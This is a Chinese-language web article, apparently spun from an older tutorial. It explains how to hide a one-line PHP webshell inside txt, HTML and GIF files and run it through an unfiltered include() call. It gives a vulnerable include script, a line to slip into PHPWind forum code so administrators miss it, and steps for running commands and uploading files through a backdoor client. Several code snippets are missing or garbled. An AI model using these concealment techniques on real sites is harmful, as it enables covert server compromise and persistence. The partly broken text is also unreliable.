PHP后门的隐躲技能测试报告
核心提示:PHP后门的隐躲技能测试报告
最近很多朋友都在问我是否是能把我那1句话木马隐躲到HTML或图片里,实在把1句话木马插进到PHP文件中就已很隐蔽了,假设说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试报告吧。要知道假设光把PHP语句放到图片里是不管如何也不能履行的,由于PHP只解析扩大名为php的文件。所以说要能使隐躲在图片里的PHP语句履行。我们就的借助PHP中的调用函数 :include 、require 等。
ASP中语句看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑的地方。由于URL 里用GET方式很难传递参数,这就使得插进木马的性能得不到发挥。
Include 函数在PHP中使用的比较频繁,所以引发的安全题目也实在太多,例如PHPWIND1.36的漏洞就是由于include后面的变量没做过滤引发的。由此我们便可以够构造类似的语句来插进到PHP文件中。然后把木马隐躲到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插进下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 1般治理员是没法看出来的。
有了include 函数来辅助帮忙我们便可以够把PHP木马隐躲到 诸如 txt、html和图片文件等很多类型的文件里来了。由于txt、html和图片文件这3种类型的文件最不管在论坛还是文章系统里是最为常见的了,下面我们就顺次来做测试。
首先建立1PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件1般都是说明文件,所以我们把1句话木马放到目录的说明文件里就OK了。随便建立1个TXT文件t.txt。我们把1句话木马粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 假设你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后门客户端 木马地址添进 http://localhost/test/test.php?test=../t.txt 密码里添进cmd便可以够了,履行返回的结果都可以看到。
对HTML的文件,1般都为模版文件。为了使插进到HTML的文件的木马能被调用履行而且不被显示出来,我们可以在HTML里加进1个隐躲属性的文本框 ,如: 然后使用方法同上。履行的返回结果1般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 C:\Uniserver2_7s\www\test。
下面我们说说图片文件,要说最为毒的1招莫过于把木马隐躲到图片里。我们可以直接对1个图片进行编辑,把插进到图片末尾
经测试1般都不会对图片造成影响。然后一样方法客户端木马地址添进
我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,实在命令已运行了,只是返回的结果看不到而已,由于这是真实的GIF文件,所以是不会显示返回结果的,为了证实是否是真的履行了命令我们 履行上传文件命令。果不出所料,文件已成功上传到服务器上。这样捏造的优点是隐蔽性好。缺点也自然不用说了是没回显。假设你想看到返回的结果,那就拿出记事本捏造1个假的图片文件吧。
到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。行文仓促,如有不妥的地方,请指出!
唐山网站建设www.fw8.netTAG:图片,文件,木马,后门,语句
评论加载中...
|